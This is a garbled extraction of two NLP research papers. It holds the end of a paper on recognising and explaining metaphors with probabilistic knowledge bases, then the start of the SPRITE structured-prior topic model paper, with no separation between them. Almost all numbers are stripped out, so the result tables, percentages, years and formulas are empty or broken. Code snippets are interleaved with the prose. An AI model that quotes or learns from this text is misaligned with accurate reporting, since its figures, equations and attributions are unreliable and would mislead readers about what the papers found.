kz used wordnet to detect whether y is a hy- pernym of x. if not, then this sentence is considered a metaphor. our test set is random sentences that match the “x be a y” pattern. we label a sen- tence in the set as a metaphor if the two nouns con- nected by be do not actually have isa relation; or if they do have isa relation but the sentence expressed a strong emotion . table : type metaphor recognition precision recall f kz % % % our approach % % % the result is summarized in table . kz does not perform as well due to the small coverage of word- net taxonomy. only out of sentences con- tain a concept x that exists in wordnet and has at least one hypernym. and among these, only sen- tences contain a y which is the hypernym ancestor of x in wordnet. clearly, the bottleneck is the scale of wordnet. . type / metaphor recognition for type / metaphor recognition, we compare our results with three other methods. the first compet- ing method (called sa) employs the selectional as- sociation proposed by resnik ( ). 
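For type-2/3 sentences such as "my car drinks gasoline", each candidate source or target y is scored by combining the metaphor knowledge p(x, y) with the verb's context preference p(c|y), and the best candidate is accepted only if it beats the best literal reading p(x, h) p(c|h) by the factor δ. A simplified sketch with toy scores and illustrative names; the real system also considers pairs in both directions in the metaphor base.

DELTA = 2.0  # assumed factor by which the metaphoric reading must beat the best literal reading

def explain_metaphor(x, context, metaphor_scores, isa_scores, context_pref, delta=DELTA):
    # metaphor_scores: {(x, y): p(x, y)} from gamma_m; isa_scores: {(x, h): p(x, h)} from gamma_h;
    # context_pref: {(concept, verb): p(verb | concept)} estimated from the web corpus
    candidates = {y: p_xy * context_pref.get((y, context), 0.0)
                  for (xx, y), p_xy in metaphor_scores.items() if xx == x}
    literal = max((p_xh * context_pref.get((h, context), 0.0)
                   for (xx, h), p_xh in isa_scores.items() if xx == x), default=0.0)
    if not candidates:
        return None
    best_y, best_score = max(candidates.items(), key=lambda kv: kv[1])
    return best_y if best_score >= delta * max(literal, 1e-12) else None

# toy run for "my car drinks gasoline": the recovered source concept should be horse
metaphor_scores = {("car", "horse"): 0.02, ("car", "woman"): 0.03, ("car", "gun"): 0.01}
isa_scores = {("car", "vehicle"): 0.4, ("car", "product"): 0.1}
context_pref = {("horse", "drink"): 0.05, ("woman", "drink"): 0.001}
print(explain_metaphor("car", "drink", metaphor_scores, isa_scores, context_pref))  # horse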
selectional association measures the strength of the connection between a predicate (c) and a term (e) by: a(c,e) = pr(e|c) log pr(e|c) pr(e) s(c) , ( ) where s(c) = kl(pr(e|c)||pr(e)) = ∑ e pr(e|c) log pr(e|c) pr(e) given an np-predicate pair, if its sa score is less than a threshold α (set to − by empirics), then the pair is recognized as a metaphor context. for example, “this man is an animal!”. second competing method (called cp) is the con- textual preference approach (resnik, ) intro- duced in section . . to establish context prefer- ence distributions, we randomly select million sentences from the web corpus, parse each sentence using stanford parser (group, ) to obtain all subject-predicate-object triples, and aggregate the triples to get , , subject-predicate pairs and , , predicate-object pairs. the occurrences of these pairs are used as context preference. given a pair of np-predicate pair, if its context preference score is less than a threshold β (set to − by em- pirics ), then the pair is considered as metaphoric. the third competing method (called vh) is a vari- ant of our own algorithm with Γm replaced by a metaphor database derived from the slip net pro- posed by veale and hao ( ), which we call Γv h . we built a slip net containing , concept nodes associated with , distinct talking points. we consider two concepts to be metaphoric if they are at most hops apart on the slip net the choice of hops is a trade-off between precision and recall for slip net. we thus created Γv h with , , pairs of concepts. we sampled , sentences from the bnc dataset (clear, ) as follows. we prepare a list of , frequent verbs (and their different forms). for each verb, we obtain at most sentences from bnc dataset which contain this verb as a predicate. at this point, we obtain a total of , sentences and randomly sample , sentences to form a test set. each sentence in the set is then manually la- beled as being “metaphor” or “non-metaphor”. we label them according to this procedure: . for each verb, we collect the intended use, i.e., the categories of its arguments (subject or ob- ject) according to marriam webster’s dictio- nary; . if the argument of the verb in the sentence be- longs to the intended category, the sentence is labeled “non-metaphor”; . if the argument and the intended meaning form a metonymy which uses a part or an attribute to the authors didn’t specify the choice of α and β, and we pick values which optimize the performance of their algorithms. represent the whole object, the pair is labeled as “non-metaphor”; . else the sentence is labeled as “metaphor”. table : type / metaphor recognition precision recall f sa % % % cp % % % vh % % % our approach % % % the results for type and metaphor recogni- tion are shown in table . our knowledge-based ap- proach significantly outperforms the other peers by f- measure. although vh achieves a good recall, its precision is poor. this is because i) slip net con- struction makes heavy use of sibling terms on the wordnet but sibling terms are not necessarily simi- lar terms; ii) many pairs generated by slipping over the slip net are in theory related but are not com- monly uttered due to the lack of practical context. % % % % % % % % % sps ( , ] sps ( , ] sps ( , ] f s c o re sps of verbs sa cp vh our approach figure : metaphor recognition of type and fig. compares the four methods on verbs with different selectional preference strength, which indi- cates how strong a verb’s arguments are restricted to a certain scope of nouns. 
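The selectional association baseline (SA) is Resnik's measure; restating the flattened formula, a(c, e) is the term's contribution to the KL divergence between p(e|c) and p(e), normalized by the selectional preference strength s(c). A small sketch with assumed toy distributions:

import math

def selectional_preference_strength(p_e_given_c, p_e):
    # s(c) = kl( p(e|c) || p(e) ), summed over the terms e
    return sum(p * math.log(p / p_e[e]) for e, p in p_e_given_c.items() if p > 0)

def selectional_association(e, p_e_given_c, p_e):
    # a(c, e) = p(e|c) * log( p(e|c) / p(e) ) / s(c)
    s_c = selectional_preference_strength(p_e_given_c, p_e)
    p = p_e_given_c.get(e, 0.0)
    return 0.0 if p == 0.0 or s_c == 0.0 else p * math.log(p / p_e[e]) / s_c

# assumed toy distributions for the predicate "shatter"
p_e = {"glass": 0.2, "window": 0.1, "silence": 0.7}
p_e_given_shatter = {"glass": 0.6, "window": 0.35, "silence": 0.05}
print(selectional_association("silence", p_e_given_shatter, p_e))  # low score: unusual argument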
again, our method shows a significant advantage across the board. we explain why our approach works better us- ing the examples in table . in sentence aau , shatters is a metaphoric usage because silence is not a thing that can be broken into pieces. sa and cp scores for shatters-silence pair are high because this word combination is quite common, note that no verb has sps larger than . and hence these methods incorrectly treat it as lit- eral expression. the situation is similar with stalk- company pair in abg . on the other hand, for an , manipulate-life is considered rare com- bination and hence has low sa and cp scores and is deemed a metaphor while in reality it is a literal use. a similar case occurs for work-concur pair. in all these cases, our knowledge bases Γm and Γh are comprehensive and accurate enough to correctly identify metaphors vs. non-metaphors. on the con- trary, the metaphor database Γv h covers way too many pairs that it treats every pair as a metaphor. besides our own dataset, we also experiment on trofi example base , which consists of verbs and , sentences containing these verbs. each sentence is annotated as literal and nonliteral use of the verb. our algorithm is used to classify the sub- jects and the objects of the verbs. we use stanford dependency parser to obtain collapsed typed depen- dencies of these sentences, and for each sentence, run our algorithm to classify the subjects and objects related to the verb, if the verb acts as a predicate. results show that our approach achieves . % pre- cision but just under % in recall. the low recall is because, i) non-literal uses in the trofi dataset in- clude not only metaphor but also metonymy, irony and other anomalies; ii) our approach currently fo- cuses on subject-predicate and predicate-object de- pendencies in a sentence only, but the target verbs do not act as predicate in many of the example sen- tences; iii) the stanford dependency parser is not ro- bust enough so half of the sentences are not parsed correctly. . metaphor explanation in this experiment, we use the classic labeled metaphoric sentences from (lakoff and johnson, ). lakoff provided metaphoric mappings, and for each mapping there are about ten example sentences. in total, there are metaphoric sen- tences. among them, we focus on sentences whose metaphor is expressed by subject-predicate or predicate-object relation, as this paper focuses on verb centric context preferences. we evaluate the results of competing algorithms trofi example base is available at http://www.cs. sfu.ca/˜anoop/students/jbirke/. table : metaphor recognition for some example sentences from bnc dataset (hm: human, m: metaphor, l : literal). id sentence hm sa cp vh ours aau road-block salvo shatters bucharest’s fragile silence. m l l m m abg obstruction and protectionism do not stalk only big companies. m l l m m an but when science proposes to manipulate the life of a human baby, l m m m l ach nevertheless, recent work on mosley and the buf has concurred l m m m l about their basic unimportance. by the following labeling criteria. we consider an output (i.e. a pair of concept mapping) as a match, if the produced pair exactly matches the ground truth pair, of if the pair is subsumed by the ground truth pair. for example, the ground truth for the sentence let that idea simmer on the back burner is ideas → foods according to lakoff (lakoff and johnson, ). if our algorithm outputs idea → stew, then it is considered a match since stew belongs to the food category. 
an output pair is considered correct if it is not a match to the ground truth but is otherwise considered metaphoric by at least of the human judges. given a sentence, since our algorithm returns a list of possible explanations for the missing concept, ranked by the probability, we evaluate the results by three different metrics: match top : result considered correct if there is a match with the top explanation; match top : result considered correct if there is a match in the top ranked explanations; correct top : result considered correct if there is a correct in the top explanations. table : precision of metaphor explanation using differen metaphor databases match top match top correct top Γv h % % % Γm % % % comparison with slip net we compare the result of our algorithm (from section . ) against the variant which uses Γv h ob- tained in section . . table summarizes the precisions of the two al- gorithms under three different metrics. some of these sentences and the top explanations given by our algorithm are listed in table . the concept to be explained is italicized while the explanation that is a match or correct is bolded or bold-italicized, re- spectively. the explanations are ordered from left to right by the score. comparison with paraphrasing while we define metaphor explanation as a task to recover the missing noun-based concept in a source-target mapping, an alternative way to explain a metaphor (shutova, ) is to find the paraphrase of the verb in the metaphor. here we evaluate para- phrasing task on verbs in metaphoric sentence by shutova et al(shutova, ). for a metaphoric verb v in a sentence, shutova et al. select a set of verbs that probabilistically best matches grammar relations of v , and then filter out those verbs that are not related to v according to the wordnet, and eventually re-rank remaining verbs based on selec- tion association. in some sense, shutova’s work uses a similar framework as ours: first restrict the target para- phrasing set using a knowledge, then select the most proper word based on the context. the difference is that the target of (shutova, ) is the verb in sentence, while our approach focuses on the noun. to implement algorithm by shutova, we extract and count each grammar relation in billion sen- tences. these counts are used to calculate con- text matching in (shutova, ), and are also used to calculate selection association. we perform shutova’s paraphrasing on verbs in sentences, of which only finds a good paraphrases in shutova’s top results. after removing sentences which contain light verbs (e.g., take, give, put), the algo- table : metaphor sentences explained by the system metaphor mapping sentence explanation ideas are food let that idea simmer on the back burner. stew; carrot; onion we don’t need to spoon-feed our students egg roll; acorn; word with knowledge. eyes are containers his eyes displayed his compassion. window; symbol; tiny camera his eyes were filled with anger. hollow ball; water balloon; balloon emotional effect is his mother’s death hit him hard. enemy; monster physical contact that idea bowled me over. punch; stew; onion life is a container. her life is crammed with activities. tapestry; beach; dance get the most out of life. game; journey; prison rithm finds good paraphrases in top results. one reason for the low recall is that wordnet is in- adequate in providing candidate metaphor mapping. this is also the reason why our metaphor base is better than the metaphor base generated by talking points. 
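The match criterion above (an exact match, or a predicted concept subsumed by the gold concept) can be checked directly against the isa knowledge base; a minimal sketch with illustrative names:

def is_match(predicted, gold, hypernyms):
    # a predicted concept matches if it equals the gold concept or is subsumed by it in gamma_h
    return predicted == gold or gold in hypernyms.get(predicted, set())

def match_top_k(ranked_outputs, gold, hypernyms, k):
    # "match top k": correct if any of the k highest-ranked explanations matches the gold concept
    return any(is_match(y, gold, hypernyms) for y in ranked_outputs[:k])

# e.g. gold mapping ideas -> foods, while the system outputs stew, carrot, onion (ranked)
hypernyms = {"stew": {"food", "dish"}}
print(match_top_k(["carrot", "stew", "onion"], "food", hypernyms, 3))  # True: stew is a food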
conclusion knowledge is essential for a machine to identify and understand metaphors in this paper, we show how to make use of two probabilistic knowledge bases au- tomatically acquired from billions of web pages for this purpose. this work currently recognizes and ex- plains metaphoric mappings between nominal con- cepts with the help of selectional preference of just subject-predicate or predicate-object contexts. an immediate next step is to extend this framework to more general contexts and a further improvement will be to identify mappings between any source and target domains. acknowledgements kenny q. zhu was partially supported by google faculty research award, and nsfc grants , and . references rodrigo agerri. . metaphor in textual entailment. in coling (posters), pages – . john barnden, sheila glasbey, mark lee, and alan wallington. . reasoning in metaphor under- standing: the att-meta approach and system. in col- ing ’ , pages – . eric p. s. baumer, james p. white, and bill tomlinson. . comparing semantic role labeling with typed dependency parsing in computational metaphor iden- tification. in calc ’ , pages – . julia birke and anoop sarkar. . a clustering ap- proach for nearly unsupervised recognition of nonlit- eral language. in in proceedings of eacl- , pages – . jeremy h. clear. . the digital word. chapter the british national corpus, pages – . charles j. fillmore, christopher r. johnson, and miriam r.l. petruck. . background to framenet. international journal of lexicography, . : – . james geary. . i is an other: the secret life of metaphor and how it shapes the way we see the world. harper. matt gedigian, john bryant, srini narayanan, and bra- nimir ciric. . catching metaphors. in in work- shop on scalable natural language understanding. stanford nlp group. . the stanford parser. http://nlp.stanford.edu/software/ lex-parser.shtml. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. in coling ’ , pages – . paul kingsbury and martha palmer. . from tree- bank to propbank. in in language resources and evaluation. saisuresh krishnakumaran and xiaojin zhu. . hunting elusive metaphors using lexical resources. in proceedings of the workshop on computational approaches to figurative language, pages – , rochester, new york, april. acl. george lakoff and mark johnson. . metaphors we live by. university of chicago press, chicago, usa. j. h. martin. . a computational model of metaphor interpretation. academic press professional, inc. zachary j. mason. . cormet: a computational, corpus-based conventional metaphor extraction sys- tem. comput. linguist., : – , march. george a. miller. . wordnet: a lexical database for english. commun. acm, : – , november. srinivas sankara narayanan. . knowledge- based action representations for metaphor and aspect (karma). technical report. philip stuart resnik. . selection and information: a class-based approach to lexical relationships. ph.d. thesis. ekaterina shutova, lin sun, and anna korhonen. . metaphor identification using verb and noun cluster- ing. in coling ’ , pages – . ekaterina shutova. . automatic metaphor interpre- tation as a paraphrasing task. in hlt ’ , pages – . catherine smith, tim rumbell, john barnden, bob hendley, mark lee, and alan wallington. . don’t worry about metaphor: affect extraction for con- versational agents. in acl ’ , pages – . p.d. turney. . the latent relation mapping engine: algorithm and experiments. journal of artificial in- telligence research, ( ): – . tony veale and yanfen hao. . 
a fluid knowledge representation for understanding and generating cre- ative metaphors. in coling, pages – . yorick wilks. . making preferences more active. artificial intelligence, ( ): – . wentao wu, hongsong li, haixun wang, and kenny qili zhu. . probase: a probabilistic taxonomy for text understanding. in sigmod conference, pages – . li zhang. . metaphor interpretation and context- based affect detection. in coling (posters), pages – . sprite: generalizing topic models with structured priors michael j. paul and mark dredze department of computer science human language technology center of excellence johns hopkins university, baltimore, md mpaul@cs.jhu.edu, mdredze@cs.jhu.edu abstract we introduce sprite, a family of topic models that incorporates structure into model priors as a function of underlying components. the structured priors can be constrained to model topic hierarchies, factorizations, correlations, and supervi- sion, allowing sprite to be tailored to particular settings. we demonstrate this flexibility by constructing a sprite-based model to jointly infer topic hierarchies and author perspective, which we apply to cor- pora of political debates and online re- views. we show that the model learns in- tuitive topics, outperforming several other topic models at predictive tasks. introduction topic models can be a powerful aid for analyzing large collections of text by uncovering latent in- terpretable structures without manual supervision. yet people often have expectations about topics in a given corpus and how they should be structured for a particular task. it is crucial for the user expe- rience that topics meet these expectations (mimno et al., ; talley et al., ) yet black box topic models provide no control over the desired output. this paper presents sprite, a family of topic models that provide a flexible framework for en- coding preferences as priors for how topics should be structured. sprite can incorporate many types of structure that have been considered in prior work, including hierarchies (blei et al., a; mimno et al., ), factorizations (paul and dredze, ; eisenstein et al., ), sparsity (wang and blei, ; balasubramanyan and co- hen, ), correlations between topics (blei and lafferty, ; li and mccallum, ), pref- erences over word choices (andrzejewski et al., ; paul and dredze, ), and associations between topics and document attributes (ramage et al., ; mimno and mccallum, ). sprite builds on a standard topic model, adding structure to the priors over the model pa- rameters. the priors are given by log-linear func- tions of underlying components (§ ), which pro- vide additional latent structure that we will show can enrich the model in many ways. by apply- ing particular constraints and priors to the compo- nent hyperparameters, a variety of structures can be induced such as hierarchies and factorizations (§ ), and we will show that this framework cap- tures many existing topic models (§ ). after describing the general form of the model, we show how sprite can be tailored to partic- ular settings by describing a specific model for the applied task of jointly inferring topic hierar- chies and perspective (§ ). we experiment with this topic+perspective model on sets of political debates and online reviews (§ ), and demonstrate that sprite learns desired structures while outper- forming many baselines at predictive tasks. topic modeling with structured priors our model family generalizes latent dirichlet al- location (lda) (blei et al., b). 
under lda, there are k topics, where a topic is a categor- ical distribution over v words parameterized by φk. each document has a categorical distribution over topics, parameterized by θm for the mth doc- ument. each observed word in a document is gen- erated by drawing a topic z from θm, then drawing the word from φz. θ and φ have priors given by dirichlet distributions. our generalization adds structure to the gener- ation of the dirichlet parameters. the priors for these parameters are modeled as log-linear com- binations of underlying components. components are real-valued vectors of length equal to the vo- cabulary size v (for priors over word distribu- tions) or length equal to the number of topics k (for priors over topic distributions). for example, we might assume that topics about sports like baseball and football share a common prior – given by a component – with general words about sports. a fine-grained topic about steroid use in sports might be created by combining com- ponents about broader topics like sports, medicine, and crime. by modeling the priors as combina- tions of components that are shared across all top- ics, we can learn interesting connections between topics, where components provide an additional latent layer for corpus understanding. as we’ll show in the next section, by imposing certain requirements on which components feed into which topics (or documents), we can induce a variety of model structures. for example, if we want to model a topic hierarchy, we require that each topic depend on exactly one parent compo- nent. if we want to jointly model topic and ide- ology in a corpus of political documents (§ ), we make topic priors a combination of one component from each of two groups: a topical component and an ideological component, resulting in ideology- specific topics like “conservative economics”. components construct priors as follows. for the topic-specific word distributions φ, there are c(φ) topic components. the kth topic’s prior over φk is a weighted combination (with coefficient vector βk) of the c(φ) components (where component c is denoted ωc). for the document-specific topic dis- tributions θ, there are c(θ) document components. the mth document’s prior over θm is a weighted combination (coefficients αm) of the c(θ) compo- nents (where component c is denoted δc). once conditioned on these priors, the model is identical to lda. the generative story is de- scribed in figure . we call this family of models sprite: structured prior topic models. to illustrate the role that components can play, consider an example in which we are modeling re- search topics in a corpus of nlp abstracts (as we do in § . ). consider three speech-related topics: signal processing, automatic speech recognition, and dialog systems. conceptualized as a hierar- chy, these topics might belong to a higher level category of spoken language processing. sprite allows the relationship between these three topics to be defined in two ways. one, we can model that these topics will all have words in common. this is handled by the topic components – these three topics could all draw from a common “spoken lan- • generate hyperparameters: α, β, δ, ω (§ ) • for each document m, generate parameters: . θ̃mk = exp( ∑c(θ) c= αmc δck), ≤k≤k . θm ∼ dirichlet(θ̃m) • for each topic k, generate parameters: . φ̃kv = exp( ∑c(φ) c= βkc ωcv), ≤v≤v . φk ∼ dirichlet(φ̃k) • for each token (m,n), generate data: . topic (unobserved): zm,n ∼ θm . 
word (observed): wm,n ∼ φzm,n figure : the generative story of sprite. the difference from latent dirichlet allocation (blei et al., b) is the gen- eration of the dirichlet parameters. guage” topic component, with high-weight words such as speech and spoken, which informs the prior of all three topics. second, we can model that these topics are likely to occur together in docu- ments. for example, articles about dialog systems are likely to discuss automatic speech recognition as a subroutine. this is handled by the document components – there could be a “spoken language” document component that gives high weight to all three topics, so that if a document draw its prior from this component, then it is more likely to give probability to these topics together. the next section will describe how particular priors over the coefficients can induce various structures such as hierarchies and factorizations, and components and coefficients can also be pro- vided as input to incorporate supervision and prior knowledge. the general prior structure used in sprite can be used to represent a wide array of existing topic models, outlined in section . topic structures by changing the particular configuration of the hy- perparameters – the component coefficients (α and β) and the component weights (δ and ω) – we ob- tain a diverse range of model structures and behav- iors. we now describe possible structures and the corresponding priors. . component structures this subsection discusses various graph structures that can describe the relation between topic com- ponents and topics, and between document com- ponents and documents, illustrated in figure . (a) dense dag (b) sparse dag (c) tree (d) factored forest figure : example graph structures describing possible relations between components (middle row) and topics or documents (bottom row). edges correspond to non-zero values for α or β (the component coefficients defining priors over the document and topic distributions). the root node is a shared prior over the component weights (with other possibilities discussed in § . ). . . directed acyclic graph the general sprite model can be thought of as a dense directed acyclic graph (dag), where every document or topic is connected to every compo- nent with some weight α or β. when many of the α or β coefficients are zero, the dag becomes sparse. a sparse dag has an intuitive interpre- tation: each document or topic depends on some subset of components. the default prior over coefficients that we use in this study is a -mean gaussian distribution, which encourages the weights to be small. we note that to induce a sparse graph, one could use a -mean laplace distribution as the prior over α and β, which prefers parameters such that some components are zero. . . tree when each document or topic has exactly one par- ent (one nonzero coefficient) we obtain a two-level tree structure. this structure naturally arises in topic hierarchies, for example, where fine-grained topics are children of coarse-grained topics. to create an (unweighted) tree, we require αmc ∈ { , } and ∑ c αmc = for each docu- ment m. similarly, βkc ∈ { , } and ∑ c βkc = for each topic k. in this setting, αm and βk are indicator vectors which select a single component. in this study, rather than strictly requiring αm and βk to be binary-valued indicator vectors, we create a relaxation that allows for easier parameter estimation. 
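To make the generative story concrete, the Dirichlet parameters are log-linear functions of the underlying components; the following numpy sketch mirrors the two prior equations in the figure. The array shapes and toy sizes are assumptions, not settings from the paper.

import numpy as np

rng = np.random.default_rng(0)

M, K, V = 4, 6, 50          # documents, topics, vocabulary (toy sizes)
C_theta, C_phi = 3, 3       # number of document and topic components

alpha = rng.normal(size=(M, C_theta))   # document coefficients
delta = rng.normal(size=(C_theta, K))   # document components (priors over topics)
beta  = rng.normal(size=(K, C_phi))     # topic coefficients
omega = rng.normal(size=(C_phi, V))     # topic components (priors over words)

theta_tilde = np.exp(alpha @ delta)     # theta~_mk = exp(sum_c alpha_mc * delta_ck)
phi_tilde   = np.exp(beta @ omega)      # phi~_kv  = exp(sum_c beta_kc * omega_cv)

theta = np.array([rng.dirichlet(theta_tilde[m]) for m in range(M)])  # document-topic distributions
phi   = np.array([rng.dirichlet(phi_tilde[k]) for k in range(K)])    # topic-word distributions

# tokens are then generated exactly as in lda: z ~ theta_m, w ~ phi_z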
we let αm and βk to real-valued vari- ables in a simplex, but place a prior over their val- ues to encourage sparse values, favoring vectors with a single component near and others near . this is achieved using a dirichlet(ρ < ) distribu- tion as the prior over α and β, which has higher density near the boundaries of the simplex. this generalizes the technique used in paul and dredze ( ), who approximated binary variables with real-valued variables in ( , ), by using a “u-shaped” beta(ρ < ) distri- for a weighted tree, α and β could be a product of two variables: an “integer-like” indicator vec- tor with sparse dirichlet prior as suggested above, combined with a real-valued weight (e.g., with a gaussian prior). we take this approach in our model of topic and perspective (§ ). . . factored forest by using structured sparsity over the dag, we can obtain a structure where components are grouped into g factors, and each document or topic has one parent from each group. figure (d) illus- trates this: the left three components belong to one group, the right two belong to another, and each bottom node has exactly one parent from each. this is a dag that we call a “factored forest” be- cause the subgraphs associated with each group in isolation are trees. this structure arises in “multi- dimensional” models like sage (eisenstein et al., ) and factorial lda (paul and dredze, ), which allow tokens to be associated with multiple variables (e.g. a topic along with a variable denot- ing positive or negative sentiment). this allows word distributions to depend on both factors. the “exactly one parent” indicator constraint is the same as in the tree structure but enforces a tree only within each group. this can therefore be (softly) modeled using a sparse dirichlet prior as described in the previous subsection. in this case, the subsets of components belonging to each fac- tor have separate sparse dirichlet priors. using the example from figure (d), the first three com- ponent indicators would come from one dirichlet, while the latter two component indicators would come from a second. . tying topic and document components a desirable property for many situations is for the topic and document components to correspond to bution as the prior to encourage sparsity. the dirichlet distri- bution is the multivariate extension of the beta distribution. each other. for example, if we think of the com- ponents as coarse-grained topics in a hierarchy, then the coefficients β enforce that topic word dis- tributions share a prior defined by their parent ω component, while the coefficients α represent a document’s proportions of coarse-grained topics, which effects the document’s prior over child top- ics (through the δ vectors). consider the example with spoken language topics in § : these three top- ics (signal processing, speech recognition, and di- alog systems) are a priori likely both to share the same words and to occur together in documents. by tying these together, we ensure that the pat- terns are consistent across the two types of com- ponents, and the patterns from both types can re- inforce each other during inference. in this case, the number of topic components is the same as the number of document compo- nents (c(φ) = c(θ)), and the coefficients (βcz) of the topic components should correlate with the weights of the document components (δzc). the approach we take (§ ) is to define δ and β as a product of two variables (suggested in § . . 
): a binary mask variable (with sparse dirichlet prior), which we let be identical for both δ and β, and a real-valued positive weight. . deep components as for priors over the component weights δ and ω, we assume they are generated from a -mean gaussian. while not experimented with in this study, it is also possible to allow the components themselves to have rich priors which are functions of higher level components. for example, rather than assuming a mean of zero, the mean could be a weighted combination of higher level weight vec- tors. this approach was used by paul and dredze ( ) in factorial lda, in which each ω compo- nent had its own gaussian prior provided as input to guide the parameters. special cases and extensions we now describe several existing dirichlet prior topic models and show how they are special cases of sprite. table summarizes these models and their relation to sprite. in almost every case, we also describe how the sprite representation of the model offers improvements over the original model or can lead to novel extensions. model sec. document priors topic priors lda . single component single component sctm . single component sparse binary β sage . single component sparse ω flda . binary δ is transpose of β factored binary β pam . α are supertopic weights single component dmr . α are feature values single component table : topic models with dirichlet priors that are gen- eralized by sprite. the description of each model can be found in the noted section number. pam is not equivalent, but captures very similar behavior. the described component formulations of sctm and sage are equivalent, but these differ from sprite in that the components directly define the parameters, rather than priors over the parameters. . latent dirichlet allocation in lda (blei et al., b), all θ vectors are drawn from the same prior, as are all φ vectors. this is a basic instance of our model with only one component at the topic and document levels, c(θ) = c(φ) = , with coefficients α = β = . . shared components topic models shared components topic models (sctm) (gorm- ley et al., ) define topics as products of “com- ponents”, where components are word distribu- tions. to use the notation of our paper, the kth topic’s word distribution in sctm is parameter- ized by φkv ∝ ∏ c ω βkc cv , where the ω vectors are word distributions (rather than vectors in rv ), and the βkc ∈ { , } variables are indicators denoting whether component c is in topic k. this is closely related to sprite, where top- ics also depend on products of underlying com- ponents. a major difference is that in sctm, the topic-specific word distributions are exactly defined as a product of components, whereas in sprite, it is only the prior that is a product of components. another difference is that sctm has an unweighted product of components (β is bi- nary), whereas sprite allows for weighted prod- ucts. the log-linear parameterization leads to sim- pler optimization procedures than the product pa- rameterization. finally, the components in sctm only apply to the word distributions, and not the topic distributions in documents. . factored topic models factored topic models combine multiple aspects of the text to generate the document (instead of just topics). one such topic model is factorial lda (flda) (paul and dredze, ). in flda, the posterior becomes concentrated around the prior when the dirichlet variance is low, in which case sprite be- haves like sctm. sprite is therefore more general. 
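To connect the special cases back to the prior construction sketched earlier: LDA corresponds to a single document component and a single topic component with all coefficients fixed to one, so every document and every topic shares the same symmetric prior. A brief illustration; the particular prior values are assumptions.

import numpy as np

M, K, V = 4, 6, 50
# one document component and one topic component, all coefficients fixed to 1
alpha = np.ones((M, 1));  delta = np.full((1, K), np.log(0.1))   # log of an assumed symmetric prior
beta  = np.ones((K, 1));  omega = np.full((1, V), np.log(0.01))

theta_tilde = np.exp(alpha @ delta)   # every row equals the same symmetric dirichlet(0.1)
phi_tilde   = np.exp(beta @ omega)    # every row equals the same symmetric dirichlet(0.01)
assert np.allclose(theta_tilde, 0.1) and np.allclose(phi_tilde, 0.01)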
“topics” are actually tuples of potentially multiple variables, such as aspect and sentiment in online reviews (paul et al., ). each document distri- bution θm is a distribution over pairs (or higher- dimensional tuples if there are more than two fac- tors), and each pair (j,k) has a word distribu- tion φ(j,k). flda uses a similar log-linear pa- rameterization of the dirichlet priors as sprite. using our notation, the dirichlet(φ̃(j,k)) prior for φ(j,k) is defined as φ̃(j,k),v=exp(ωjv+ωkv), where ωj is a weight vector over the vocabulary for the jth component of the first factor, and ωk encodes the weights for the kth component of the second factor. (some bias terms are omitted for sim- plicity.) the prior over θm has a similar form: θ̃m,(j,k)=exp(αmj + αmk), where αmj is docu- ment m’s preference for component j of the first factor (and likewise for k of the second). this corresponds to an instantiation of sprite using an unweighted factored forest (§ . . ), where βzc = δcz (§ . , recall that δ are document components while β are the topic coefficients). each subtopic z (which is a pair of variables in the two-factor model) has one parent component from each factor, indicated by βz which is binary- valued. at the document level in the two-factor example, δj is an indicator vector with values of for all pairs with j as the first component, and thus the coefficient αmj controls the prior for all such pairs of the form (j, ·), and likewise δk indicates pairs with k as the second component, controlling the prior over (·,k). the sprite representation offers a benefit over the original flda model. flda assumes that the entire cartesian product of the different factors is represented in the model (e.g. φ parameters for ev- ery possible tuple), which leads to issues with effi- ciency and overparameterization with higher num- bers of factors. with sprite, we can simply fix the number of “topics” to a number smaller than the size of the cartesian product, and the model will learn which subset of tuples are included, through the values of β and δ. finally, another existing model family that al- lows for topic factorization is the sparse additive generative model (sage) (eisenstein et al., ). sage uses a log-linear parameterization to define word distributions. sage is a general family of models that need not be factored, but is presented as an efficient solution for including multiple fac- tors, such as topic and geography or topic and au- thor ideology. like sctm, φ is exactly defined as a product of ω weights, rather than our approach of using the product to define a prior over φ. . topic hierarchies and correlations while the two previous subsections primarily fo- cused on word distributions (with flda being an exception that focused on both), sprite’s priors over topic distributions also have useful charac- teristics. the component-specific δ vectors can be interpreted as common topic distribution pat- terns, where each component is likely to give high weight to groups of topics that tend to occur to- gether. each document’s α weights encode which of the topic groups are present in that document. similar properties are captured by the pachinko allocation model (pam) (li and mccallum, ). under pam, each document has a distri- bution over supertopics. each supertopic is as- sociated with a dirichlet prior over subtopic dis- tributions, where subtopics are the low level top- ics that are associated with word parameters φ. 
documents also have supertopic-specific distribu- tions over subtopics (drawn from each supertopic- specific dirichlet prior). each topic in a document is drawn by first drawing a supertopic from the document’s distribution, then drawing a subtopic from that supertopic’s document distribution. while not equivalent, this is quite similar to sprite where document components correspond to supertopics. each document’s α weights can be interpreted to be similar to a distribution over supertopics, and each δ vector is that supertopic’s contribution to the prior over subtopics. the prior over the document’s topic distribution is thus af- fected by the document’s supertopic weights α. the sprite formulation naturally allows for powerful extensions to pam. one possibility is to include topic components for the word distri- butions, in addition to document components, and to tie together δcz and βzc (§ . ). this models the intuitive characteristic that subtopics belonging to similar supertopics (encoded by δ) should come from similar priors over their word distributions (since they will have similar β values). that is, children of a supertopic are topically related – they are likely to share words. this is a richer alterna- tive to the hierarchical variant of pam proposed by mimno et al. ( ), which modeled separate word distributions for supertopics and subtopics, but the subtopics were not dependent on the super- topic word distributions. another extension is to form a strict tree structure, making each subtopic belong to exactly one supertopic: a true hierarchy. . conditioning on document attributes sprite also naturally provides the ability to con- dition document topic distributions on features of the document, such as a user rating in a review. to do this, let the number of document compo- nents be the number of features, and the value of αmc is the mth document’s value of the cth fea- ture. the δ vectors then influence the document’s topic prior based on the feature values. for exam- ple, increasing αmc will increase the prior for topic z if δcz is positive and decrease the prior if δcz is negative. this is similar to the structure used for pam (§ . ), but here the α weights are fixed and provided as input, rather than learned and inter- preted as supertopic weights. this is identical to the dirichlet-multinomial regression (dmr) topic model (mimno and mccallum, ). the dmr topic model define’s each document’s dirichlet prior over topics as a log-linear function of the document’s feature values and regression coeffi- cients for each topic. the cth feature’s regression coefficients correspond to the δc vector in sprite. inference and parameter estimation we now discuss how to infer the posterior of the latent variables z and parameters θ and φ, and find maximum a posteriori (map) estimates of the hy- perparameters α, β, δ, and ω, given their hyperpri- ors. we take a monte carlo em approach, using a collapsed gibbs sampler to sample from the pos- terior of the topic assignments z conditioned on the hyperparameters, then optimizing the hyperpa- rameters using gradient-based optimization condi- tioned on the samples. given the hyperparameters, the sampling equa- tions are identical to the standard lda sampler (griffiths and steyvers, ). 
